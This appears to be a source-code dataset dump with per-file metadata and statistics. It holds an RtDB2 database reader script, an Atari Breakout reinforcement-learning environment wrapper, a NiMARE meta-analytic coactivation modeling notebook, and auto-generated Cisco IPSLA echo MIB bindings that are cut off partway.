value: [2, [1581172987, 618438], [0.05368572473526001, -0.2938263416290283, 5.330356597900391], [0.1385340541601181, -0.8020891547203064, 0.7817431688308716], False, [0.0, 0.0], 6, 'A']
Example: rtdb2_get.py -a 2 DIAG_WORLDMODEL_LOCAL -x "['balls'][0]['result']"
[[5.3209381103515625, 0.5837346315383911, 0.15281200408935547], [-0.0029433025047183037, 0.01433953270316124, 1.2758345292240847e-05], 1.0, [22033, 1889585904]]
"""
parser = argparse.ArgumentParser(description=descriptionTxt, epilog=exampleTxt, formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('-a', '--agent', help='agent ID to use', type=int, default=rtdb2tools.guessAgentId())
parser.add_argument('-s', '--serialized', help='also show serialized string (as hexdump)', action='store_true')
parser.add_argument('-p', '--path', help='database path to use', type=str, default=RTDB2_DEFAULT_PATH)
parser.add_argument('-x', '--expression', help='evaluate expression, useful to fetch a specific element', type=str)
parser.add_argument('key', help='RtDB key to read')
args = parser.parse_args()
# Create instance of RtDB2Store and read databases from disk
rtdb2Store = RtDB2Store(args.path)
item = rtdb2Store.get(args.agent, args.key, timeout=None)
if args.expression:
print(eval("item.value" + args.expression))
else:
print(str(item))
if args.serialized:
hexdump(item.value_serialized)
rtdb2Store.closeAll()
| 42.106383
| 186
| 0.723598
| 255
| 1,979
| 5.513725
| 0.513725
| 0.032006
| 0.060455
| 0.024182
| 0.025605
| 0
| 0
| 0
| 0
| 0
| 0
| 0.161443
| 0.145528
| 1,979
| 46
| 187
| 43.021739
| 0.670018
| 0.098535
| 0
| 0
| 0
| 0.0625
| 0.443131
| 0.087838
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.1875
| 0
| 0.1875
| 0.0625
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe9ed7b6294e532592cc4dcafea632566b56df4d
| 2,219
|
py
|
Python
|
algorithms/A3C/atari/atari_env_deprecated.py
|
what3versin/reinforce_py
|
46769da50aea65346cd3a300b55306d25f1f2683
|
[
"MIT"
] | 1
|
2018-11-09T02:56:27.000Z
|
2018-11-09T02:56:27.000Z
|
algorithms/A3C/atari/atari_env_deprecated.py
|
syd951186545/reinforce_py
|
46769da50aea65346cd3a300b55306d25f1f2683
|
[
"MIT"
] | null | null | null |
algorithms/A3C/atari/atari_env_deprecated.py
|
syd951186545/reinforce_py
|
46769da50aea65346cd3a300b55306d25f1f2683
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
from __future__ import division
import os
import gym
import numpy as np
from skimage.transform import resize
from skimage.color import rgb2gray
class Atari(object):
s_dim = [84, 84, 1]
a_dim = 3
def __init__(self, args, record_video=False):
self.env = gym.make('BreakoutNoFrameskip-v4')
self.ale = self.env.env.ale # ale interface
if record_video:
video_dir = os.path.join(args.save_path, 'videos')
if not os.path.exists(video_dir):
os.makedirs(video_dir)
self.env = gym.wrappers.Monitor(
self.env, video_dir, video_callable=lambda x: True, resume=True)
self.ale = self.env.env.env.ale
self.screen_size = Atari.s_dim[:2] # 84x84
self.noop_max = 30
self.frame_skip = 4
self.frame_feq = 4
self.s_dim = Atari.s_dim
self.a_dim = Atari.a_dim
self.action_space = [1, 2, 3] # Breakout specify
self.done = True
    def new_round(self):
        if not self.done:  # dead but not done
            # no-op step to advance from terminal/lost life state
            obs, _, _, _ = self.env.step(0)
            obs = self.preprocess(obs)
        else:  # terminal
            self.env.reset()
            # No-op
            for _ in range(np.random.randint(1, self.noop_max + 1)):
                obs, _, _, _ = self.env.step(0)
                obs = self.preprocess(obs)
        # (Re)initialize the frame buffer used by step(); without this,
        # step() would reference self.state before it exists.
        self.state = np.reshape(obs, newshape=self.screen_size + [1])
        return obs
def preprocess(self, observ):
return resize(rgb2gray(observ), self.screen_size)
def step(self, action):
observ, reward, dead = None, 0, False
for _ in range(self.frame_skip):
lives_before = self.ale.lives()
o, r, self.done, _ = self.env.step(self.action_space[action])
lives_after = self.ale.lives()
reward += r
if lives_before > lives_after:
dead = True
break
observ = self.preprocess(o)
observ = np.reshape(observ, newshape=self.screen_size + [1])
self.state = np.append(self.state[:, :, 1:], observ, axis=2)
return self.state, reward, dead, self.done
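# --- Illustrative usage (not part of the original class) ---
# A minimal sketch of driving the wrapper for one episode; it assumes gym with the
# Atari extras is installed, and `args` is a hypothetical stand-in (save_path is
# only read when record_video=True). The random policy is a placeholder.
if __name__ == '__main__':
    import argparse
    args = argparse.Namespace(save_path='/tmp/atari_demo')  # hypothetical path
    env = Atari(args)
    obs = env.new_round()
    done = False
    while not done:
        action = np.random.randint(Atari.a_dim)  # random placeholder policy
        state, reward, dead, done = env.step(action)
        if dead and not done:
            obs = env.new_round()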
| 32.632353
| 80
| 0.581794
| 297
| 2,219
| 4.175084
| 0.360269
| 0.050806
| 0.033871
| 0.022581
| 0.079032
| 0.051613
| 0.051613
| 0.051613
| 0
| 0
| 0
| 0.019041
| 0.313655
| 2,219
| 67
| 81
| 33.119403
| 0.795141
| 0.054529
| 0
| 0.037037
| 0
| 0
| 0.013397
| 0.010526
| 0
| 0
| 0
| 0
| 0
| 1
| 0.074074
| false
| 0
| 0.12963
| 0.018519
| 0.314815
| 0.018519
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe9f7091809e30b40cd88cb5967081a6b1484eed
| 5,935
|
py
|
Python
|
content/_build/jupyter_execute/macm.py
|
NBCLab/nimare-paper
|
2b9e70febcfde4ca12420adc3c2910ff622252f2
|
[
"MIT"
] | 3
|
2020-10-20T10:24:04.000Z
|
2021-12-20T13:31:01.000Z
|
content/_build/jupyter_execute/macm.py
|
NBCLab/nimare-paper
|
2b9e70febcfde4ca12420adc3c2910ff622252f2
|
[
"MIT"
] | 20
|
2021-03-07T17:18:48.000Z
|
2022-03-09T15:13:02.000Z
|
content/_build/jupyter_execute/macm.py
|
NBCLab/nimare-paper
|
2b9e70febcfde4ca12420adc3c2910ff622252f2
|
[
"MIT"
] | 3
|
2020-05-05T14:42:18.000Z
|
2021-11-30T19:52:27.000Z
|
#!/usr/bin/env python
# coding: utf-8
# # Meta-Analytic Coactivation Modeling
# In[1]:
# First, import the necessary modules and functions
import os
from datetime import datetime
import matplotlib.pyplot as plt
from myst_nb import glue
from repo2data.repo2data import Repo2Data
import nimare
start = datetime.now()
# Install the data if running locally, or point to the cached data if running on NeuroLibre
DATA_REQ_FILE = os.path.join("../binder/data_requirement.json")
FIG_DIR = os.path.abspath("../images")
# Download data
repo2data = Repo2Data(DATA_REQ_FILE)
data_path = repo2data.install()
data_path = os.path.join(data_path[0], "data")
# Now, load the Datasets we will use in this chapter
neurosynth_dset = nimare.dataset.Dataset.load(os.path.join(data_path, "neurosynth_dataset.pkl.gz"))
# Meta-analytic coactivation modeling (MACM) {cite:p}`Laird2009-gc,Robinson2010-iv,Eickhoff2010-vx`, also known as meta-analytic connectivity modeling, uses meta-analytic data to measure co-occurrence of activations between brain regions providing evidence of functional connectivity of brain regions across tasks.
# In coordinate-based MACM, whole-brain studies within the database are selected based on whether or not they report at least one peak in a region of interest specified for the analysis.
# These studies are then subjected to a meta-analysis, often comparing the selected studies to those remaining in the database.
# In this way, the significance of each voxel in the analysis corresponds to whether there is greater convergence of foci at the voxel among studies which also report foci in the region of interest than those which do not.
#
# <!-- TODO: Determine appropriate citation style here. -->
#
# MACM results have historically been accorded a similar interpretation to task-related functional connectivity (e.g., {cite:p}`Hok2015-lt,Kellermann2013-en`), although this approach is quite removed from functional connectivity analyses of task fMRI data (e.g., beta-series correlations, psychophysiological interactions, or even seed-to-voxel functional connectivity analyses on task data).
# Nevertheless, MACM analyses do show high correspondence with resting-state functional connectivity {cite:p}`Reid2017-ez`.
# MACM has been used to characterize the task-based functional coactivation of the cerebellum {cite:p}`Riedel2015-tx`, lateral prefrontal cortex {cite:p}`Reid2016-ba`, fusiform gyrus {cite:p}`Caspers2014-ja`, and several other brain regions.
#
# Within NiMARE, MACMs can be performed by selecting studies in a Dataset based on the presence of activation within a target mask or coordinate-centered sphere.
#
# In this section, we will perform two MACMs: one with a target mask and one with a coordinate-centered sphere.
# For the former, we use {py:meth}`nimare.dataset.Dataset.get_studies_by_mask`.
# For the latter, we use {py:meth}`nimare.dataset.Dataset.get_studies_by_coordinate`.
# In[2]:
# Create Dataset only containing studies with peaks within the amygdala mask
amygdala_mask = os.path.join(data_path, "amygdala_roi.nii.gz")
amygdala_ids = neurosynth_dset.get_studies_by_mask(amygdala_mask)
dset_amygdala = neurosynth_dset.slice(amygdala_ids)
# Create Dataset only containing studies with peaks within the sphere ROI
sphere_ids = neurosynth_dset.get_studies_by_coordinate([[24, -2, -20]], r=6)
dset_sphere = neurosynth_dset.slice(sphere_ids)
# In[3]:
import numpy as np
from nilearn import input_data, plotting
# In order to plot a sphere with a precise radius around a coordinate with
# nilearn, we need to use a NiftiSpheresMasker
mask_img = neurosynth_dset.masker.mask_img
sphere_masker = input_data.NiftiSpheresMasker([[24, -2, -20]], radius=6, mask_img=mask_img)
sphere_masker.fit(mask_img)
sphere_img = sphere_masker.inverse_transform(np.array([[1]]))
fig, axes = plt.subplots(figsize=(6, 4), nrows=2)
display = plotting.plot_roi(
amygdala_mask,
annotate=False,
draw_cross=False,
axes=axes[0],
figure=fig,
)
axes[0].set_title("Amygdala ROI")
display = plotting.plot_roi(
sphere_img,
annotate=False,
draw_cross=False,
axes=axes[1],
figure=fig,
)
axes[1].set_title("Spherical ROI")
glue("figure_macm_rois", fig, display=False)
# ```{glue:figure} figure_macm_rois
# :name: figure_macm_rois
# :align: center
#
# Region of interest masks for (1) a target mask-based MACM and (2) a coordinate-based MACM.
# ```
# Once the `Dataset` has been reduced to studies with coordinates within the mask or sphere requested, any of the supported CBMA Estimators can be run.
# In[4]:
from nimare import meta
meta_amyg = meta.cbma.ale.ALE(kernel__sample_size=20)
results_amyg = meta_amyg.fit(dset_amygdala)
meta_sphere = meta.cbma.ale.ALE(kernel__sample_size=20)
results_sphere = meta_sphere.fit(dset_sphere)
# In[5]:
meta_results = {
"Amygdala ALE MACM": results_amyg.get_map("z", return_type="image"),
"Sphere ALE MACM": results_sphere.get_map("z", return_type="image"),
}
fig, axes = plt.subplots(figsize=(6, 4), nrows=2)
for i_meta, (name, file_) in enumerate(meta_results.items()):
display = plotting.plot_stat_map(
file_,
annotate=False,
axes=axes[i_meta],
cmap="Reds",
cut_coords=[24, -2, -20],
draw_cross=False,
figure=fig,
)
axes[i_meta].set_title(name)
colorbar = display._cbar
colorbar_ticks = colorbar.get_ticks()
if colorbar_ticks[0] < 0:
new_ticks = [colorbar_ticks[0], 0, colorbar_ticks[-1]]
else:
new_ticks = [colorbar_ticks[0], colorbar_ticks[-1]]
colorbar.set_ticks(new_ticks, update_ticks=True)
glue("figure_macm", fig, display=False)
# ```{glue:figure} figure_macm
# :name: figure_macm
# :align: center
#
# Unthresholded z-statistic maps for (1) the target mask-based MACM and (2) the coordinate-based MACM.
# ```
# In[6]:
end = datetime.now()
print(f"macm.md took {end - start} to build.")
| 36.411043
| 392
| 0.752148
| 895
| 5,935
| 4.860335
| 0.351955
| 0.01931
| 0.009195
| 0.009655
| 0.165517
| 0.142989
| 0.108966
| 0.076782
| 0.076782
| 0.01977
| 0
| 0.018387
| 0.147767
| 5,935
| 162
| 393
| 36.635802
| 0.841637
| 0.532435
| 0
| 0.178082
| 0
| 0
| 0.082142
| 0.020535
| 0
| 0
| 0
| 0.006173
| 0
| 1
| 0
| false
| 0
| 0.123288
| 0
| 0.123288
| 0.013699
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe9f96734192b94aa40844f25ed620f799a5da53
| 50,863
|
py
|
Python
|
cisco-ios-xe/ydk/models/cisco_ios_xe/CISCO_IPSLA_ECHO_MIB.py
|
Maikor/ydk-py
|
b86c4a7c570ae3b2c5557d098420446df5de4929
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
cisco-ios-xe/ydk/models/cisco_ios_xe/CISCO_IPSLA_ECHO_MIB.py
|
Maikor/ydk-py
|
b86c4a7c570ae3b2c5557d098420446df5de4929
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
cisco-ios-xe/ydk/models/cisco_ios_xe/CISCO_IPSLA_ECHO_MIB.py
|
Maikor/ydk-py
|
b86c4a7c570ae3b2c5557d098420446df5de4929
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
""" CISCO_IPSLA_ECHO_MIB
This MIB module defines the templates for IP SLA operations of
ICMP echo, UDP echo and TCP connect.
The ICMP echo operation measures end\-to\-end response time between
a Cisco router and any IP enabled device by computing the time
taken between sending an ICMP echo request message to the
destination and receiving an ICMP echo reply.
The UDP echo operation measures end\-to\-end response time between
a Cisco router and any IP enabled device by computing the time
taken between sending an UDP echo request message to the
destination and receiving an UDP echo reply.
The TCP connect operation measures end\-to\-end response time between
a Cisco router and any IP enabled device by computing the time
taken to perform a TCP connect operation.
"""
from collections import OrderedDict
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class CISCOIPSLAECHOMIB(Entity):
"""
.. attribute:: cipslaicmpechotmpltable
A table that contains ICMP echo template definitions
**type**\: :py:class:`CipslaIcmpEchoTmplTable <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable>`
.. attribute:: cipslaudpechotmpltable
A table that contains UDP echo template specific definitions
**type**\: :py:class:`CipslaUdpEchoTmplTable <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable>`
.. attribute:: cipslatcpconntmpltable
A table that contains TCP connect template specific definitions
**type**\: :py:class:`CipslaTcpConnTmplTable <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable>`
"""
_prefix = 'CISCO-IPSLA-ECHO-MIB'
_revision = '2007-08-16'
def __init__(self):
super(CISCOIPSLAECHOMIB, self).__init__()
self._top_entity = None
self.yang_name = "CISCO-IPSLA-ECHO-MIB"
self.yang_parent_name = "CISCO-IPSLA-ECHO-MIB"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("cipslaIcmpEchoTmplTable", ("cipslaicmpechotmpltable", CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable)), ("cipslaUdpEchoTmplTable", ("cipslaudpechotmpltable", CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable)), ("cipslaTcpConnTmplTable", ("cipslatcpconntmpltable", CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable))])
self._leafs = OrderedDict()
self.cipslaicmpechotmpltable = CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable()
self.cipslaicmpechotmpltable.parent = self
self._children_name_map["cipslaicmpechotmpltable"] = "cipslaIcmpEchoTmplTable"
self.cipslaudpechotmpltable = CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable()
self.cipslaudpechotmpltable.parent = self
self._children_name_map["cipslaudpechotmpltable"] = "cipslaUdpEchoTmplTable"
self.cipslatcpconntmpltable = CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable()
self.cipslatcpconntmpltable.parent = self
self._children_name_map["cipslatcpconntmpltable"] = "cipslaTcpConnTmplTable"
self._segment_path = lambda: "CISCO-IPSLA-ECHO-MIB:CISCO-IPSLA-ECHO-MIB"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(CISCOIPSLAECHOMIB, [], name, value)
class CipslaIcmpEchoTmplTable(Entity):
"""
A table that contains ICMP echo template definitions.
.. attribute:: cipslaicmpechotmplentry
A row entry representing an IPSLA ICMP echo template
**type**\: list of :py:class:`CipslaIcmpEchoTmplEntry <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable.CipslaIcmpEchoTmplEntry>`
"""
_prefix = 'CISCO-IPSLA-ECHO-MIB'
_revision = '2007-08-16'
def __init__(self):
super(CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable, self).__init__()
self.yang_name = "cipslaIcmpEchoTmplTable"
self.yang_parent_name = "CISCO-IPSLA-ECHO-MIB"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("cipslaIcmpEchoTmplEntry", ("cipslaicmpechotmplentry", CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable.CipslaIcmpEchoTmplEntry))])
self._leafs = OrderedDict()
self.cipslaicmpechotmplentry = YList(self)
self._segment_path = lambda: "cipslaIcmpEchoTmplTable"
self._absolute_path = lambda: "CISCO-IPSLA-ECHO-MIB:CISCO-IPSLA-ECHO-MIB/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable, [], name, value)
class CipslaIcmpEchoTmplEntry(Entity):
"""
A row entry representing an IPSLA ICMP echo template.
.. attribute:: cipslaicmpechotmplname (key)
This field is used to specify the ICMP echo template name
**type**\: str
**length:** 1..64
.. attribute:: cipslaicmpechotmpldescription
This field is used to provide description for the ICMP echo template
**type**\: str
**length:** 0..128
.. attribute:: cipslaicmpechotmplsrcaddrtype
An enumerated value which specifies the IP address type of the source. It must be used along with the cipslaIcmpEchoTmplSrcAddr object
**type**\: :py:class:`InetAddressType <ydk.models.cisco_ios_xe.INET_ADDRESS_MIB.InetAddressType>`
.. attribute:: cipslaicmpechotmplsrcaddr
A string which specifies the IP address of the source
**type**\: str
**length:** 0..255
.. attribute:: cipslaicmpechotmpltimeout
Specifies the duration to wait for a IP SLA operation completion. For connection oriented protocols, this may cause the connection to be closed by the operation. Once closed, it will be assumed that the connection reestablishment will be performed. To prevent unwanted closure of connections, be sure to set this value to a realistic connection timeout
**type**\: int
**range:** 0..604800000
**units**\: milliseconds
.. attribute:: cipslaicmpechotmplverifydata
When set to true, the resulting data in each IP SLA operation is compared with the expected data. This includes checking header information (if possible) and exact packet size
**type**\: bool
.. attribute:: cipslaicmpechotmplreqdatasize
This object represents the number of octets to be placed into the ARR Data portion of the request message, when using SNA protocols. For non\-ARR protocols' IP SLA request/responses, this value represents the native payload size. REMEMBER\: The ARR Header overhead is not included in this value
**type**\: int
**range:** 0..16384
**units**\: octets
.. attribute:: cipslaicmpechotmpltos
This object represents the type of service octet in an IP header
**type**\: int
**range:** 0..255
.. attribute:: cipslaicmpechotmplvrfname
This field is used to specify the VRF name with which the IP SLA operation will be used. For regular IP SLA operation this field should not be configured. The agent will use this field to identify the VRF routing table for this operation
**type**\: str
**length:** 0..32
.. attribute:: cipslaicmpechotmplthreshold
This object defines an administrative threshold limit. If the IP SLA operation time exceeds this limit and if the condition specified in cipslaIcmpEchoTmplHistFilter is satisfied, one threshold crossing occurrence will be counted
**type**\: int
**range:** 0..2147483647
**units**\: milliseconds
.. attribute:: cipslaicmpechotmplhistlives
The maximum number of history lives to record. A life is defined by the countdown (or transition) to zero by the cipslaAutoGroupScheduleLife object. A new life is created when the same conceptual control row is restarted via the transition of the cipslaAutoGroupScheduleLife object and its subsequent countdown. The value of zero will shut off all data collection
**type**\: int
**range:** 0..2
.. attribute:: cipslaicmpechotmplhistbuckets
The maximum number of history buckets to record. This value is set to the number of operations to keep per lifetime. After cipslaIcmpEchoTmplHistBuckets are filled, the oldest entries are deleted and the most recent cipslaIcmpEchoTmplHistBuckets buckets are retained
**type**\: int
**range:** 1..60
.. attribute:: cipslaicmpechotmplhistfilter
Defines a filter for adding RTT results to the history buffer\: none(1) \- no history is recorded all(2) \- the results of all completion times and failed completions are recorded overThreshold(3) \- the results of completion times over cipslaIcmpEchoTmplThreshold are recorded. failures(4) \- the results of failed operations (only) are recorded
**type**\: :py:class:`CipslaIcmpEchoTmplHistFilter <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable.CipslaIcmpEchoTmplEntry.CipslaIcmpEchoTmplHistFilter>`
.. attribute:: cipslaicmpechotmplstatshours
The maximum number of hours for which statistics are maintained. Specifically this is the number of hourly groups to keep before rolling over. The value of one is not advisable because the hourly group will close and immediately be deleted before the network management station will have the opportunity to retrieve the statistics. The value of zero will shut off data collection
**type**\: int
**range:** 0..25
**units**\: hours
.. attribute:: cipslaicmpechotmpldistbuckets
The maximum number of statistical distribution buckets to accumulate. Since this index does not rollover, only the first cipslaIcmpEchoTmplStatsNumDistBuckets will be kept. The last cipslaIcmpEchoTmplStatsNumDistBucket will contain all entries from its distribution interval start point to infinity
**type**\: int
**range:** 1..20
.. attribute:: cipslaicmpechotmpldistinterval
The statistical distribution buckets interval. Distribution Bucket Example\: cipslaIcmpEchoTmplDistBuckets = 5 buckets cipslaIcmpEchoTmplDistInterval = 10 milliseconds \| Bucket 1 \| Bucket 2 \| Bucket 3 \| Bucket 4 \| Bucket 5 \| \| 0\-9 ms \| 10\-19 ms \| 20\-29 ms \| 30\-39 ms \| 40\-Inf ms \| Odd Example\: cipslaIcmpEchoTmplDistBuckets = 1 buckets cipslaIcmpEchoTmplDistInterval = 10 milliseconds \| Bucket 1 \| \| 0\-Inf ms \| Thus, this odd example shows that the value of cipslaIcmpEchoTmplDistInterval does not apply when cipslaIcmpEchoTmplDistBuckets is one
**type**\: int
**range:** 1..100
**units**\: milliseconds
.. attribute:: cipslaicmpechotmplstoragetype
The storage type of this conceptual row
**type**\: :py:class:`StorageType <ydk.models.cisco_ios_xe.SNMPv2_TC.StorageType>`
.. attribute:: cipslaicmpechotmplrowstatus
The status of the conceptual ICMP echo template control row. When the status is active, all the read\-create objects in that row can be modified
**type**\: :py:class:`RowStatus <ydk.models.cisco_ios_xe.SNMPv2_TC.RowStatus>`
"""
_prefix = 'CISCO-IPSLA-ECHO-MIB'
_revision = '2007-08-16'
def __init__(self):
super(CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable.CipslaIcmpEchoTmplEntry, self).__init__()
self.yang_name = "cipslaIcmpEchoTmplEntry"
self.yang_parent_name = "cipslaIcmpEchoTmplTable"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['cipslaicmpechotmplname']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('cipslaicmpechotmplname', (YLeaf(YType.str, 'cipslaIcmpEchoTmplName'), ['str'])),
('cipslaicmpechotmpldescription', (YLeaf(YType.str, 'cipslaIcmpEchoTmplDescription'), ['str'])),
('cipslaicmpechotmplsrcaddrtype', (YLeaf(YType.enumeration, 'cipslaIcmpEchoTmplSrcAddrType'), [('ydk.models.cisco_ios_xe.INET_ADDRESS_MIB', 'InetAddressType', '')])),
('cipslaicmpechotmplsrcaddr', (YLeaf(YType.str, 'cipslaIcmpEchoTmplSrcAddr'), ['str'])),
('cipslaicmpechotmpltimeout', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplTimeOut'), ['int'])),
('cipslaicmpechotmplverifydata', (YLeaf(YType.boolean, 'cipslaIcmpEchoTmplVerifyData'), ['bool'])),
('cipslaicmpechotmplreqdatasize', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplReqDataSize'), ['int'])),
('cipslaicmpechotmpltos', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplTOS'), ['int'])),
('cipslaicmpechotmplvrfname', (YLeaf(YType.str, 'cipslaIcmpEchoTmplVrfName'), ['str'])),
('cipslaicmpechotmplthreshold', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplThreshold'), ['int'])),
('cipslaicmpechotmplhistlives', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplHistLives'), ['int'])),
('cipslaicmpechotmplhistbuckets', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplHistBuckets'), ['int'])),
('cipslaicmpechotmplhistfilter', (YLeaf(YType.enumeration, 'cipslaIcmpEchoTmplHistFilter'), [('ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB', 'CISCOIPSLAECHOMIB', 'CipslaIcmpEchoTmplTable.CipslaIcmpEchoTmplEntry.CipslaIcmpEchoTmplHistFilter')])),
('cipslaicmpechotmplstatshours', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplStatsHours'), ['int'])),
('cipslaicmpechotmpldistbuckets', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplDistBuckets'), ['int'])),
('cipslaicmpechotmpldistinterval', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplDistInterval'), ['int'])),
('cipslaicmpechotmplstoragetype', (YLeaf(YType.enumeration, 'cipslaIcmpEchoTmplStorageType'), [('ydk.models.cisco_ios_xe.SNMPv2_TC', 'StorageType', '')])),
('cipslaicmpechotmplrowstatus', (YLeaf(YType.enumeration, 'cipslaIcmpEchoTmplRowStatus'), [('ydk.models.cisco_ios_xe.SNMPv2_TC', 'RowStatus', '')])),
])
self.cipslaicmpechotmplname = None
self.cipslaicmpechotmpldescription = None
self.cipslaicmpechotmplsrcaddrtype = None
self.cipslaicmpechotmplsrcaddr = None
self.cipslaicmpechotmpltimeout = None
self.cipslaicmpechotmplverifydata = None
self.cipslaicmpechotmplreqdatasize = None
self.cipslaicmpechotmpltos = None
self.cipslaicmpechotmplvrfname = None
self.cipslaicmpechotmplthreshold = None
self.cipslaicmpechotmplhistlives = None
self.cipslaicmpechotmplhistbuckets = None
self.cipslaicmpechotmplhistfilter = None
self.cipslaicmpechotmplstatshours = None
self.cipslaicmpechotmpldistbuckets = None
self.cipslaicmpechotmpldistinterval = None
self.cipslaicmpechotmplstoragetype = None
self.cipslaicmpechotmplrowstatus = None
self._segment_path = lambda: "cipslaIcmpEchoTmplEntry" + "[cipslaIcmpEchoTmplName='" + str(self.cipslaicmpechotmplname) + "']"
self._absolute_path = lambda: "CISCO-IPSLA-ECHO-MIB:CISCO-IPSLA-ECHO-MIB/cipslaIcmpEchoTmplTable/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable.CipslaIcmpEchoTmplEntry, ['cipslaicmpechotmplname', 'cipslaicmpechotmpldescription', 'cipslaicmpechotmplsrcaddrtype', 'cipslaicmpechotmplsrcaddr', 'cipslaicmpechotmpltimeout', 'cipslaicmpechotmplverifydata', 'cipslaicmpechotmplreqdatasize', 'cipslaicmpechotmpltos', 'cipslaicmpechotmplvrfname', 'cipslaicmpechotmplthreshold', 'cipslaicmpechotmplhistlives', 'cipslaicmpechotmplhistbuckets', 'cipslaicmpechotmplhistfilter', 'cipslaicmpechotmplstatshours', 'cipslaicmpechotmpldistbuckets', 'cipslaicmpechotmpldistinterval', 'cipslaicmpechotmplstoragetype', 'cipslaicmpechotmplrowstatus'], name, value)
class CipslaIcmpEchoTmplHistFilter(Enum):
"""
CipslaIcmpEchoTmplHistFilter (Enum Class)
Defines a filter for adding RTT results to the history
buffer\:
none(1) \- no history is recorded
all(2) \- the results of all completion times
and failed completions are recorded
overThreshold(3) \- the results of completion times
over cipslaIcmpEchoTmplThreshold are
recorded.
failures(4) \- the results of failed operations (only)
are recorded.
.. data:: none = 1
.. data:: all = 2
.. data:: overThreshold = 3
.. data:: failures = 4
"""
none = Enum.YLeaf(1, "none")
all = Enum.YLeaf(2, "all")
overThreshold = Enum.YLeaf(3, "overThreshold")
failures = Enum.YLeaf(4, "failures")
class CipslaUdpEchoTmplTable(Entity):
"""
A table that contains UDP echo template specific definitions.
.. attribute:: cipslaudpechotmplentry
A row entry representing an IPSLA UDP echo template
**type**\: list of :py:class:`CipslaUdpEchoTmplEntry <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable.CipslaUdpEchoTmplEntry>`
"""
_prefix = 'CISCO-IPSLA-ECHO-MIB'
_revision = '2007-08-16'
def __init__(self):
super(CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable, self).__init__()
self.yang_name = "cipslaUdpEchoTmplTable"
self.yang_parent_name = "CISCO-IPSLA-ECHO-MIB"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("cipslaUdpEchoTmplEntry", ("cipslaudpechotmplentry", CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable.CipslaUdpEchoTmplEntry))])
self._leafs = OrderedDict()
self.cipslaudpechotmplentry = YList(self)
self._segment_path = lambda: "cipslaUdpEchoTmplTable"
self._absolute_path = lambda: "CISCO-IPSLA-ECHO-MIB:CISCO-IPSLA-ECHO-MIB/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
